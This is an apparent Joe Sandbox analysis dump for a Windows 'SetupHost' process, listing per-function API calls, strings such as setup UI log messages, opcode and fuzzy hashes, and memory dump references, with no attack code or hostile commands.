                                                                                                                                                                                                                • Instruction ID: 91c37d99faa918bf0b461f2585365acc1fb827d6ed94acaffe259815fb53e4a2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e943dc4bd7990e158f788b147e4e685812eb634bce2a6f5c2eb1ebecd092379c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BC114C72644A55ABE722466A8C49BAE762D9F40F3DF274714FD25E72D0DB70DC028290
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 009BEA20
                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,00000000), ref: 009BEA37
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000), ref: 009BEA52
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,00000000), ref: 009BEA62
                                                                                                                                                                                                                  • Part of subcall function 009BEA79: SetLastError.KERNEL32(00000057,00000000,00000000,00000000,?,?,009BEA4C,?,00000000), ref: 009BEA91
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$FileModuleNamememset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3770714783-0
                                                                                                                                                                                                                • Opcode ID: 940225a44e059bb39a7f49725d76594b2c8067b3e2a4290f8c4cf4d0fcde9f8a
                                                                                                                                                                                                                • Instruction ID: a313cfde2dcd6a40c684832d4683c4dfd7f5d3e5695907d024027dfcedc6bbf2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 940225a44e059bb39a7f49725d76594b2c8067b3e2a4290f8c4cf4d0fcde9f8a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5D01D1B57013086BD720EBA5AC89EEF7BBCEB84360F100179F905C3281EE70CE468660
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00A0BEDE: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00A09637,000000FF,00000000,00000000,00000000,00000000,00000001,?,?,00A0990D,00000001,00000000,00000000), ref: 00A0BEF9
                                                                                                                                                                                                                • _wtoi.MSVCRT ref: 00A099CB
                                                                                                                                                                                                                  • Part of subcall function 00A0BEB8: GetProcessHeap.KERNEL32(00000000,?,00000000,00A0992D,00A09637,00000001,00000000,00000000,?,?,?,?,00A09637,00000000,?,?), ref: 00A0BEC8
                                                                                                                                                                                                                  • Part of subcall function 00A0BEB8: HeapFree.KERNEL32(00000000), ref: 00A0BECF
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$ByteCharFreeMultiProcessWide_wtoi
                                                                                                                                                                                                                • String ID: refreshInterval$settings
                                                                                                                                                                                                                • API String ID: 2164680352-662174367
                                                                                                                                                                                                                • Opcode ID: f1b845c9820d044a737fd20d6c1a948267102f6de1d4c6ffbdb5b01bc79e9817
                                                                                                                                                                                                                • Instruction ID: 5ee2b80fa4eb940f2a95d348d0e92bae83ab80d40d56d0227925ace743a42038
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f1b845c9820d044a737fd20d6c1a948267102f6de1d4c6ffbdb5b01bc79e9817
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8351D572E001199FCB10EF68D9816AFF7B1FF54790F554169D906AB2A2EB30DD82CB90
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetFileSizeEx.KERNEL32(?,?), ref: 009EC2DA
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FileSize
                                                                                                                                                                                                                • String ID: Incorrect filesize. Could be corrupted$VerifyFileByHandle
                                                                                                                                                                                                                • API String ID: 3433856609-3984483981
                                                                                                                                                                                                                • Opcode ID: ed04bb6065bb354af5808fcb09ba2e95e787bc07e993db9d47c6a2756ec31919
                                                                                                                                                                                                                • Instruction ID: 7a30050aebbbea1bb46deec56bf48983038fec4b577078433c4d806010e70596
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ed04bb6065bb354af5808fcb09ba2e95e787bc07e993db9d47c6a2756ec31919
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82418071204381ABCB22DE56C880D6FBBE9EF88761F04991DF99597290D730DD46CBA2
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: H_prolog3
                                                                                                                                                                                                                • String ID: %s %s$CSetupHost::ModifyCommandLine
                                                                                                                                                                                                                • API String ID: 431132790-1797866112
                                                                                                                                                                                                                • Opcode ID: 763176bdd733a257c99c8c9b85385aae75f21b49778ff80292d685133de8a27d
                                                                                                                                                                                                                • Instruction ID: 239be996b9f9916cee8219fa8535a6c9295bbe397a32e62b3f3313544e680e5b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 763176bdd733a257c99c8c9b85385aae75f21b49778ff80292d685133de8a27d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 87316470B003159BDB04EF94C985ABE73A9AFC5714F154829FA11BB381DBB89D05CBD2
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: H_prolog3
                                                                                                                                                                                                                • String ID: %s\%d$Tel#Sqm
                                                                                                                                                                                                                • API String ID: 431132790-1604967033
                                                                                                                                                                                                                • Opcode ID: c708f7c9946a998380217d7e630ef82c62e063210cc514e909bad70fee85a15f
                                                                                                                                                                                                                • Instruction ID: 45cbbb345d288db6c493483768fea3c9735a7d9529b47377ea319821c0ab4bf5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c708f7c9946a998380217d7e630ef82c62e063210cc514e909bad70fee85a15f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E2218F76A0011A9B8F11EF94C941EBE77BAAFC9724B118519FD11BB301D734DE019BE1
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00A06AB8
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Time$SystemVariant
                                                                                                                                                                                                                • String ID: %.2X$%d-%02d-%02dT%02d:%02d:%02d
                                                                                                                                                                                                                • API String ID: 352189841-4260601390
                                                                                                                                                                                                                • Opcode ID: ea8b4e23ab245f571b4487d803d1763599df0f7ca4aa85f9d6ac0921f5f58e9f
                                                                                                                                                                                                                • Instruction ID: 98e3aa06e1ca361a78e10648e2ab144a05d2506f206321c8e84270c863f5b6d0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ea8b4e23ab245f571b4487d803d1763599df0f7ca4aa85f9d6ac0921f5f58e9f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7621AFB2A4051DBAC764ABB9AD459BBF7BCFB09714B100515F861D2081EA34ED60D7B0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: H_prolog3
                                                                                                                                                                                                                • String ID: CSystemHelper::SetTrayTitle$SetupUI: Setting tray title: [%s]
                                                                                                                                                                                                                • API String ID: 431132790-2712632151
                                                                                                                                                                                                                • Opcode ID: f0c678ed22c4295750ef05321b801dee84708b3b17274208aad65c25c9becaca
                                                                                                                                                                                                                • Instruction ID: e6c7910c80107d39b9e35280e8e12403516a4af30af3ababa03a2d5e031b51df
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f0c678ed22c4295750ef05321b801dee84708b3b17274208aad65c25c9becaca
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 72215171B106258BCF04EFB4C995AAE77B6AFC8710B148529E906AB391CE74DD02CB91
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: H_prolog3
                                                                                                                                                                                                                • String ID: CSystemHelper::SetMessage$SetupUI: Setting message: [%s]
                                                                                                                                                                                                                • API String ID: 431132790-2563188694
                                                                                                                                                                                                                • Opcode ID: 3db2ccb4007e803539167be35e0bf11983446d874acdc676c82c841a1237ae12
                                                                                                                                                                                                                • Instruction ID: 0a09d6db127549a9c913ad2807cc18e4264ce0db7aa14298b03606a314474df9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3db2ccb4007e803539167be35e0bf11983446d874acdc676c82c841a1237ae12
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 41215170B102258BCF04EFB4C999AAE77B6AFC4720B149569FC16AB381DE74DD01CB91
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy_ssprintf_s
                                                                                                                                                                                                                • String ID: %u!
                                                                                                                                                                                                                • API String ID: 458736077-3756441844
                                                                                                                                                                                                                • Opcode ID: a5e94171a80e0dd061e5cd14de39d02999fa231ab104b639aa79d6b0efffef96
                                                                                                                                                                                                                • Instruction ID: c315a43e2e0940969dc48401d1283b6508dd8eb1c77787363e1b9c40ee4636a1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a5e94171a80e0dd061e5cd14de39d02999fa231ab104b639aa79d6b0efffef96
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3511343180C2D02ACB124B6D5868BFA3FAC6F53324F08509AFCE5CB243E16AC90597F0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • *** Assertion failed: %s*** Source File: %s, line %ld, xrefs: 009DB3E9
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: PrintRaiseStatus
                                                                                                                                                                                                                • String ID: *** Assertion failed: %s*** Source File: %s, line %ld
                                                                                                                                                                                                                • API String ID: 2749562092-472101979
                                                                                                                                                                                                                • Opcode ID: 5ca692a35e29c78c2b4b3550f00ebc73250a9ef951cbb35512ee5c3311a6b482
                                                                                                                                                                                                                • Instruction ID: 2719ed9ebe045e02068e674144fde706de9f673ffa04d4ae5252e830d318e198
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5ca692a35e29c78c2b4b3550f00ebc73250a9ef951cbb35512ee5c3311a6b482
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 14F0B431682105D7D714E6899D45E6EB76D9F94326F16C45AF905C7211C331AC029790
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetLocalTime.KERNEL32(?,Def,?,?,?,?,?,?,?,?,00A00A7C), ref: 00A003DB
                                                                                                                                                                                                                • SystemTimeToVariantTime.OLEAUT32(?,?), ref: 00A003E9
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Time$LocalSystemVariant
                                                                                                                                                                                                                • String ID: Def
                                                                                                                                                                                                                • API String ID: 2941933870-881436545
                                                                                                                                                                                                                • Opcode ID: bb480b8f9a879dbd0112c04a62cc11f5841b8377e27946a8be5c4e69137d8f9a
                                                                                                                                                                                                                • Instruction ID: 37e9ff17380e119e6977b6efb565d436f0b212ce64768f877da3a84fffe04994
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bb480b8f9a879dbd0112c04a62cc11f5841b8377e27946a8be5c4e69137d8f9a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EAF0DA75A0450DBBDF11DBF9E9558FEB7F8EB4C300B104565E502E7160DA34AA099722
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 009A890B
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 009A8922
                                                                                                                                                                                                                  • Part of subcall function 009B9B21: GetProcessHeap.KERNEL32(00000000,?,009A7D2F), ref: 009B9B2B
                                                                                                                                                                                                                  • Part of subcall function 009B9B21: HeapFree.KERNEL32(00000000), ref: 009B9B32
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 009A8BB4
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 009A8BC5
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseHandle$Heap$FreeProcess
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2625698119-0
                                                                                                                                                                                                                • Opcode ID: 71d7e1d99303a9d8355eeba01c7a3c3f14ee164c1bf3206617a0cc456a809f78
                                                                                                                                                                                                                • Instruction ID: d3291d2d7ae91e0f47a45ef915c78e6bedeb9756e620aecc0d9784545357840a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 71d7e1d99303a9d8355eeba01c7a3c3f14ee164c1bf3206617a0cc456a809f78
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 56B15274711A12ABDB1CDFA6E595BAAFBA4FF89711B44812DD41AC7A50CF30B810CBD0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000028,?,00000000,00000278,009D3C5C,00000000,000000FF,000000FF,?,?,?,00000000,?), ref: 009D70E4
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 009D70EB
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009D713E
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009D7145
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$AllocFree
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 756756679-0
                                                                                                                                                                                                                • Opcode ID: d18167f8f3ed537f2bdba3d6f75304a2b9e0adf8ca1a152c15d7125a9fda52b2
                                                                                                                                                                                                                • Instruction ID: 822f44e0751c7008bab788cae30eb4151ba96d813e909e18541c7cc98bf1f947
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d18167f8f3ed537f2bdba3d6f75304a2b9e0adf8ca1a152c15d7125a9fda52b2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF514F75A4830A9FDB14CFA4C844AAEFBB9EF49314F14C5AAE815DB351E770E901CB60
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000028,?,?), ref: 009D724C
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 009D7253
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009D72A4
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009D72AB
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$AllocFree
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 756756679-0
                                                                                                                                                                                                                • Opcode ID: 50b22c47eae64b93dfd9acee5249977181d442518bda3d5d4df65cafa805c93c
                                                                                                                                                                                                                • Instruction ID: d6ca5d4fd7a15eeab29e83f5da3849e39cb7d79e18094714fc2a3613def5166e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 50b22c47eae64b93dfd9acee5249977181d442518bda3d5d4df65cafa805c93c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8C414D74A4464ADFCB14CFD4C884A6EFBB9EF49310B14C4AAE915DB350E731E901CBA0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000028,?,?,?,009D73CC,?,00000001,00000001,?,00000000,00000000,?,00000001,00000001,00000000), ref: 009D771C
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 009D7723
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009D77E1
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009D77E8
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$AllocFree
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 756756679-0
                                                                                                                                                                                                                • Opcode ID: 674a27bcea1a1d37cc8bd09ffae34a2e8282a38803f9738def2a2f0f17200c28
                                                                                                                                                                                                                • Instruction ID: 587aead209badc27881233d75c83d0469ffc5ff3f54c55cc5f5cf4298dfd1264
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 674a27bcea1a1d37cc8bd09ffae34a2e8282a38803f9738def2a2f0f17200c28
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 29317076C00B1ADFDB21CFA8C444B9FF7F5BF89721F11891AE915AB250D770A9068B90
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 009E35E5
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 009E35EC
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009E3663
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009E366A
